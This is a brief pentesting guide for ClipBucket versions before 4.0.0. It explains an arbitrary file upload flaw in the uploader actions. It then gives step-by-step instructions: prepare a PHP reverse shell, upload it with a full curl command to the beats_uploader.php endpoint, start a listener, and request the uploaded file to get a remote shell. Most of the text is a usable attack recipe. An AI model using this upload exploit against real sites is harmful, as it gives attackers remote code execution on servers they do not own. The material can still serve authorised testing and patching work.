ClipBucket Pentesting
ClipBucket is a freely downloadable PHP script that will let you start your own Video Sharing website (YouTube Clone).
Arbitrary File Upload < v4.0.0
ClipBucket versions before 4.0.0 is vulnerable to file upload in ‘uploader’ actions. We can upload arbitrary files so we can execute reverse shell.
1. Prepare Payload
Create a PHP script to reverse shell in local machine.
Update $ip and $port with your local ip address and port.
2. Upload the Payload
Next upload the above PHP script to the target website.
curl -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "https://example.com/actions/beats_uploader.php"
3. Reverse Shell
In local machine, start a listener.
Then access to https://example.com/actions/CB_BEATS_UPLOAD_DIR/<uploaded_filename>.php
.
We should get a shell.